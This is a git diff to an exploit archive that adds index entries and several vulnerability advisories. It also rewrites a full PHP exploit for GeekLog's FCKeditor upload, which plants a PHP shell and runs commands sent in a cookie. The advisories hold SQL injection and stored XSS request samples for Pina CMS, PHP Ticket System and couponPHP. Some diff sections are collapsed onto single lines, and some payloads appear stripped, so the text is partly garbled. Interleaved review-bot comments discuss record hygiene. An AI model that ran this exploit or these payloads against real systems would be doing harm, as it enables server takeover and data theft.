diff --git a/files.csv b/files.csv
index 8172651ec..ffdf28988 100755
--- a/files.csv
+++ b/files.csv
@@ -1671,7 +1671,7 @@ id,file,description,date,author,platform,type,port
 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) Remote SQL Injection Vulnerability",2006-06-28,KeyCoder,php,webapps,0
 1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
 1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
-1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
+1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
 1965,platforms/windows/remote/1965.pm,"MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
 1967,platforms/windows/dos/1967.c,"MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
 1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
@@ -28527,6 +28527,7 @@ id,file,description,date,author,platform,type,port
 31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL php/index.php nom_branche - Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
 31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL php/info.php - Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
 31733,platforms/hardware/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,hardware,webapps,50496
+31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80
 31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 (index.php, cID param) - SQL Injection",2014-02-18,killall-9,php,webapps,80
 31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80
 31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution",2014-02-18,metasploit,windows,remote,0
@@ -28699,6 +28700,7 @@ id,file,description,date,author,platform,type,port
 31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0
 31909,platforms/windows/remote/31909.html,"XChat 2.8.7b - 'ircs://' URI Command Execution Vulnerability",2008-06-13,securfrog,windows,remote,0
 31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0
+31911,platforms/linux/local/31911.txt,"Vim 7.x - Vim Script Multiple Command Execution Vulnerabilities",2008-06-14,"Jan Minar",linux,local,0
 31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0
 31914,platforms/windows/dos/31914.pl,"GoldMP4Player 3.3 - Buffer Overflow PoC (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
 31915,platforms/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80
@@ -28756,6 +28758,7 @@ id,file,description,date,author,platform,type,port
 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting Vulnerability",2008-06-26,"Erez Metula",asp,webapps,0
 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service Vulnerability",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80
+31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 (get_all_created_by_user.php, id param) - SQL Injection",2014-02-28,HauntIT,php,webapps,80
 31972,platforms/windows/local/31972.py,"GoldMP4Player 3.3 - Buffer Overflow Exploit (SEH)",2014-02-28,metacom,windows,local,0
 31975,platforms/php/webapps/31975.txt,"The Rat CMS viewarticle.php Multiple Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0
 31976,platforms/php/webapps/31976.txt,"The Rat CMS viewarticle2.php id Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0
@@ -28772,6 +28775,7 @@ id,file,description,date,author,platform,type,port
 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80
 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
+31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0
 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0
 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
 31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Stored XSS Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
@@ -28815,3 +28819,14 @@ id,file,description,date,author,platform,type,port
 32034,platforms/php/webapps/32034.txt,"V-webmail 1.6.4 includes/cachedConfig.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
 32035,platforms/php/webapps/32035.txt,"V-webmail 1.6.4 includes/prepend.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
 32036,platforms/php/webapps/32036.txt,"V-webmail 1.6.4 includes/email.list.search.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Stored XSS and SQL Injection Vulnerabilities",2014-03-03,LiquidWorm,php,webapps,0
+32038,platforms/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent XSS Vulnerability",2014-03-03,"Christian Catalano",php,webapps,0
+32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0
+32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary XSS File Upload",2014-03-03,"Christian Catalano",php,webapps,0
+32041,platforms/windows/local/32041.pl,"ALLPlayer 5.8.1 - (.m3u file) Buffer Overflow (SEH)",2014-03-03,"Gabor Seljan",windows,local,0
+32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 'register.php' Multiple Cross Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0
+32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/ 5.2 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0
+32047,platforms/php/webapps/32047.txt,"Hudson 1.223 'q' Parameter Cross-Site Scripting Vulnerability",2008-07-11,syniack,php,webapps,0
+32048,platforms/osx/remote/32048.html,"Apple iPhone and iPod Touch Prior to Version 2.0 Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0
+32049,platforms/windows/remote/32049.txt,"Microsoft Internet Explorer 6.0 New ActiveX Object String Concatenation Memory Corruption Vulnerability",2008-07-14,0x000000,windows,remote,0
+32050,platforms/windows/local/32050.py,"Calavera UpLoader 3.5 - SEH Buffer Overflow",2014-03-04,"Daniel la calavera",windows,local,0
diff --git a/platforms/jsp/webapps/32046.txt b/platforms/jsp/webapps/32046.txt
new file mode 100755
index 000000000..c9197aafc
--- /dev/null
+++ b/platforms/jsp/webapps/32046.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/30180/info
+
+IBM Maximo is prone to multiple HTML-injection vulnerabilities and an information-disclosure vulnerability.
+
+An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Code execution may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Information obtained may aid in further attacks.
+
+These issues affect IBM Maximo 4.1 and 5.2; other versions may also be vulnerable.
+
+GET /jsp/common/system/debug.jsp HTTP/1.1
+Accept:
+Accept-Language:
+UA-CPU:
+Accept-Encoding:
+User-Agent:
+Host: maximo
+Connection: Keep-Alive
+Cookie:
\ No newline at end of file
diff --git a/platforms/linux/local/31911.txt b/platforms/linux/local/31911.txt
new file mode 100755
index 000000000..f37ad802b
--- /dev/null
+++ b/platforms/linux/local/31911.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29715/info
+
+Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Successfully exploiting these issues can allow an attacker to execute arbitrary commands with the privileges of the user running the affected application.
+
+Vim 7.1.298 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/31911-1.zip
+http://www.exploit-db.com/sploits/31911-2.zip
+http://www.exploit-db.com/sploits/31911-3.zip
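Review bot: The request sample that closes the new 32046.txt documents only the information-disclosure issue (`GET /jsp/common/system/debug.jsp`); the HTML-injection vulnerabilities named in the files.csv title for 32046 and in the file's first paragraph are described but no affected page or parameter is recorded, so the entry cannot be matched against a deployment or a fix. If the source advisory (BID 30180) names the injection point, a line such as `HTML injection: [affected page/parameter per BID 30180]` after the version line would make the record self-contained. `Host: maximo` also reads as the researcher's hostname rather than a placeholder; `Host: [target]` would match the `http://target.com/...` convention used by 31734.txt in this same commit.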
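Review bot: The new 31911.txt holds no verifiable material of its own: beyond the BID summary, its content is three archives referenced only by URL (`31911-1.zip` through `31911-3.zip`) with no digest, so a reader of the archive cannot confirm that what they download is what was catalogued, and the record goes dark if those URLs move. Recording a digest next to each link, e.g. `# sha256: [checksum of 31911-1.zip]`, would make the entry self-verifying in the way the sibling text entries in this commit already are.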
diff --git a/platforms/osx/remote/32048.html b/platforms/osx/remote/32048.html new file mode 100755 index 000000000..c8a6759f5 --- /dev/null +++ b/platforms/osx/remote/32048.html @@ -0,0 +1,74 @@ +source: http://www.securityfocus.com/bid/30186/info + +Apple iPhone and iPod touch are prone to multiple remote vulnerabilities: + +1. A vulnerability that may allow users to spoof websites. +2. An information-disclosure vulnerability. +3. A buffer-overflow vulnerability. +4. Two memory-corruption vulnerabilities. + +Successfully exploiting these issues may allow attackers to execute arbitrary code, crash the affected application, obtain sensitive information, or direct unsuspecting victims to a spoofed site; other attacks are also possible. + +These issues affect iPhone 1.0 through 1.1.4 and iPod touch 1.1 through 1.1.4. + + + + + + + diff --git a/platforms/php/webapps/1964.php b/platforms/php/webapps/1964.php index a628c48db..d6752c8f1 100755 --- a/platforms/php/webapps/1964.php +++ b/platforms/php/webapps/1964.php 
@@ -1,140 +1,140 @@ -#!/usr/bin/php -q -d short_open_tag=on - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$port=80; -$proxy=""; -$cmd=""; -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -$shell=""; -$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"); -for ($i=0; $i<=count($allowed_extensions)-1; $i++){ -$filename="suntzu.php.".$allowed_extensions[$i]; -$data="-----------------------------7d529a1d23092a\r\n"; -$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n"; -$data.="Content-Type:\r\n\r\n"; -$data.="$shell\r\n"; -$data.="-----------------------------7d529a1d23092a--\r\n"; -$packet="POST ".$p."fckeditor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?Command=FileUpload&Type=File HTTP/1.0\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -sleep(1); -$packet="GET ".$p."images/library/File/".$filename." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: cmd=".$cmd."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -if (eregi("Hi Master!",$html)){ -echo"Exploit succeeded...!\n"; -$temp=explode("*delim*",$html); -die($temp[1]);} -} -//if you are here... 
-echo "Exploit failed..."; -?> - -# milw0rm.com [2006-06-29] +#!/usr/bin/php -q -d short_open_tag=on + 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$port=80; +$proxy=""; +$cmd=""; +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +$shell=""; +$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"); +for ($i=0; $i<=count($allowed_extensions)-1; $i++){ +$filename="suntzu.php.".$allowed_extensions[$i]; +$data="-----------------------------7d529a1d23092a\r\n"; +$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n"; +$data.="Content-Type:\r\n\r\n"; +$data.="$shell\r\n"; +$data.="-----------------------------7d529a1d23092a--\r\n"; +$packet="POST ".$p."fckeditor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?Command=FileUpload&Type=File HTTP/1.0\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +sleep(1); +$packet="GET ".$p."images/library/File/".$filename." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: cmd=".$cmd."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +if (eregi("Hi Master!",$html)){ +echo"Exploit succeeded...!\n"; +$temp=explode("*delim*",$html); +die($temp[1]);} +} +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-06-29] diff --git a/platforms/php/webapps/31734.txt b/platforms/php/webapps/31734.txt new file mode 100755 index 000000000..9d3df2636 --- /dev/null +++ b/platforms/php/webapps/31734.txt 
@@ -0,0 +1,34 @@
+############################################################################
+# Title: Pina CMS SQL Injection and XSS Vulnerabilities
+# Vendor: www.pinacms.com
+# Vendor Notified: 15-02-2014
+# Vendor Replied: 16-02-2014
+# Release in Public: 18-02-2014
+# Tested on: Windows/Linux
+# Author/Found by: Shadman Tanjim
+# Website: www.secupent.com and www.vulnerability.io
+# Email: service@secupent.com or shadman2600@gmail.com
+# Twitter: twitter.com/secupent
+# Facebook: fb.me/secupent
+############################################################################
+
+1. Vulnerability no 1 (SQL Injection):
+
+http://target.com/page.php?action=post.manage.home&blog_id=1%27%22
+
+Demo screenshot: https://www.dropbox.com/s/cpxvk7h1dxu8xnv/pina2.png
+
+2. Vulnerability no 2. (XSS):
+
+Go to this link: http://demo.pinacms.com/page.php?action=post.manage.home
+
+Apply this JavaScript on search bar
+
+ "/>
+
+Demo screenshot: https://www.dropbox.com/s/8jc51blyepypfas/pina1.png
+
+
+
+
+Greets: Sayem Islam, Maruf Alam, Isti Ak Ahmed, Team BCA, Team Secupent and all Cyber Security Expert and Bug Hunters.....
diff --git a/platforms/php/webapps/31971.txt b/platforms/php/webapps/31971.txt
new file mode 100755
index 000000000..7d8b9903c
--- /dev/null
+++ b/platforms/php/webapps/31971.txt
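Review bot: Neither the header block of the new 31734.txt nor the files.csv entry added for it in the second hunk (`"Pina CMS - Multiple Vulnerabilities"`) records an affected version or tested build, unlike the sibling entries in this commit (31971.txt has `# Version .| BETA_1.zip`, 32037.txt has `Affected version: 1.0`), so the record cannot be matched against a deployment or against a later vendor fix. A line such as `# Version: [affected version]` in the header, and the version in the CSV title, would close that gap. The XSS reproduction step also points at the vendor's public demo host (`http://demo.pinacms.com/...`) while the SQL-injection step uses the `target.com` placeholder; the demo host should be replaced by the same placeholder. The payload line after `Apply this JavaScript on search bar` reads only ` "/>` here, which may be an artifact of how this page was extracted rather than the committed content, but is worth checking in the file itself.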
@@ -0,0 +1,22 @@
+# ==============================================================
+# Title ...| PHP Ticket System SQL Injection
+# Version .| BETA_1.zip
+# Date ....| 27.02.2014
+# Found ...| HauntIT Blog
+# Home ....| http://sourceforge.net/projects/phpticketsystem/
+# ==============================================================
+
+
+# ==============================================================
+# SQL Injection
+
+------
+GET /k/cms/beta/mods/tickets/data/get_all_created_by_user.php?id='mynameissqli&sort%5B0%5D%5Bfield%5D=undefined&sort%5B0%5D%5Bdir%5D=desc HTTP/1.1
+Host: 10.149.14.62
+------
+
+
+# ==============================================================
+# More @ http://HauntIT.blogspot.com
+# Thanks! ;)
+# o/
\ No newline at end of file
diff --git a/platforms/php/webapps/32037.txt b/platforms/php/webapps/32037.txt
new file mode 100755
index 000000000..3cef2ebb7
--- /dev/null
+++ b/platforms/php/webapps/32037.txt
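Review bot: The request sample in the new 31971.txt carries `Host: 10.149.14.62`, which appears to be the researcher's lab address rather than a placeholder, and the request path embeds what looks like an install-specific prefix (`/k/cms/beta/`) in front of the application path. Both should be normalised so the record describes the product and not one installation: `Host: [target]`, and a note that the affected script is `mods/tickets/data/get_all_created_by_user.php` relative to the application root. 32037.txt in the same commit already redacts its session with `Cookie: [removed]`, which is the convention to follow here.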
@@ -0,0 +1,128 @@ +couponPHP CMS 1.0 Multiple Stored XSS and SQL Injection Vulnerabilities + + +Vendor: couponPHP +Product web page: http://www.couponphp.com +Affected version: 1.0 + +Summary: couponPHP is a revolutionary content management system +for running Coupon and Deal websites. It is feature rich, powerful, +beautifully designed and fully automatic. + +Desc: couponPHP is vulnerable to multiple Stored XSS and SQL Injection issues. +Input passed via the parameters 'iDisplayLength' and 'iDisplayStart' in +'comments_paginate.php' and 'stores_paginate.php' scripts are not properly +sanitised before being returned to the user or used in SQL queries. This can +be exploited to manipulate SQL queries by injecting arbitrary SQL code. + +The parameter 'sEcho' in 'comments_paginate.php' and 'stores_paginate.php' and the +parameters 'affiliate_url', 'description', 'domain', 'seo[description]', 'seo[heading]', +'seo[title]', 'seo[keywords]', 'setting[logo]', 'setting[perpage]' and 'setting[sitename]' +in '/admin/index.php' script are vulnerable to stored XSS issues where the attacker +can execute arbitrary HTML and script code in a user's browser session in context +of an affected site. 
+ + +Tested on: Apache/2.2.14(Ubuntu) + PHP/5.3.2-1ubuntu4.14 + + +Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5170 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5170.php + + +01.02.2014 + +-- + + +SQL Injections: +---------------- + +http://localhost/admin/ajax/comments_paginate.php?sEcho=1&iColumns=7&sColumns=&iDisplayStart=0[SQL Inject]&iDisplayLength=250[SQL Inject] +http://localhost/admin/ajax/stores_paginate.php?sEcho=1&iColumns=12&sColumns=&iDisplayStart=0[SQL Inject]&iDisplayLength=250[SQL Inject] + + +Full Request/Response Sample: +------------------------------ + +GET /admin/ajax/stores_paginate.php?sEcho=1&iColumns=12&sColumns=&iDisplayStart=0&iDisplayLength=250'&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&mDataProp_8=8&mDataProp_9=9&mDataProp_10=10&mDataProp_11=11&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&sSearch_8=&bRegex_8=false&bSearchable_8=true&sSearch_9=&bRegex_9=false&bSearchable_9=true&sSearch_10=&bRegex_10=false&bSearchable_10=true&sSearch_11=&bRegex_11=false&bSearchable_11=true&iSortingCols=0&bSortable_0=false&bSortable_1=false&bSortable_2=true&bSortable_3=true&bSortable_4=false&bSortable_5=true&bSortable_6=true&bSortable_7=true&bSortable_8=true&bSortable_9=true&bSortable_10=false&bSortable_11=false HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest 
+Referer: http://localhost/admin/index.php?menu=stores_manage +Cookie: [removed] +Connection: keep-alive + + +HTTP/1.1 200 OK +Date: Sun, 02 Feb 2014 17:27:42 GMT +Server: Apache/2.2.14 (Ubuntu) +X-Powered-By: PHP/5.3.2-1ubuntu4.14 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Vary: Accept-Encoding +Content-Length: 153 +Keep-Alive: timeout=15, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 #277 + +----------------------- + + + +Reflected and Persistent XSS: +------------------------------ + +http://localhost/admin/ajax/comments_paginate.php?sEcho=1"> (Reflected, GET) +http://localhost/admin/ajax/stores_paginate.php?sEcho=1"> (Reflected, GET) + + +http://localhost/admin/index.php (Persistent, POST) +- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane2&affiliate_url=kakodane">&seo%5Btitle%5D=&seo%5Bkeywords%5D=&seo%5Bdescription%5D=&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store + + +http://localhost/admin/index.php (Persistent, POST) +- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane&affiliate_url=kakodane3&seo%5Btitle%5D=&seo%5Bkeywords%5D=&seo%5Bdescription%5D=&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store + + +http://localhost/admin/index.php (Persistent, POST) +- 
thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane">&description=kakodane2&affiliate_url=kakodane3&seo%5Btitle%5D=&seo%5Bkeywords%5D=&seo%5Bdescription%5D=&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store + + +http://localhost/admin/index.php (Persistent, POST) +- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane2&affiliate_url=kakodane3&seo%5Btitle%5D=&seo%5Bkeywords%5D=&seo%5Bdescription%5D=&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store + + +http://localhost/admin/index.php (Persistent, POST) +- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane2&affiliate_url=kakodane3&seo%5Btitle%5D=&seo%5Bkeywords%5D=&seo%5Bdescription%5D=&seo%5Bheading%5D=">&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store + + +http://localhost/admin/index.php (Persistent, POST) +- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane2&affiliate_url=kakodane3&seo%5Btitle%5D=&seo%5Bkeywords%5D=">&seo%5Bdescription%5D=&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store + + +http://localhost/admin/index.php (Persistent, POST) +- thumbnail=store_8f08c534d509e7dd8a19906a0c0622a5.jpg&title=Testing101&domain=kakodane&description=kakodane2&affiliate_url=kakodane3&seo%5Btitle%5D=">&seo%5Bkeywords%5D=&seo%5Bdescription%5D=&seo%5Bheading%5D=&categories%5B%5D=3&categories%5B%5D=17&categories%5B%5D=35&categories%5B%5D=47&menu=stores_new&add_store=Add+store + + +http://localhost/admin/index.php (Persistent, POST) +- 
setting%5Bsitename%5D=couponPHP">&setting%5Blogo%5D=logo_e3c61f6eb1039f2b1f02301a7635b7af.jpg&setting%5Bperpage%5D=50&setting%5Ballow_submit%5D=on&menu=settings_general&setting_name=site&tab=1&save_setting=Save + + +http://localhost/admin/index.php (Persistent, POST) +- setting%5Bsitename%5D=couponPHP&setting%5Blogo%5D=logo_e3c61f6eb1039f2b1f02301a7635b7af.jpg&setting%5Bperpage%5D=50">&setting%5Ballow_submit%5D=on&menu=settings_general&setting_name=site&tab=1&save_setting=Save + + +http://localhost/admin/index.php (Persistent, POST) +- setting%5Bsitename%5D=couponPHP&setting%5Blogo%5D=logo_e3c61f6eb1039f2b1f02301a7635b7af.jpg">&setting%5Bperpage%5D=50&setting%5Ballow_submit%5D=on&menu=settings_general&setting_name=site&tab=1&save_setting=Save diff --git a/platforms/php/webapps/32038.txt b/platforms/php/webapps/32038.txt new file mode 100755 index 000000000..4ec468e93 --- /dev/null +++ b/platforms/php/webapps/32038.txt 
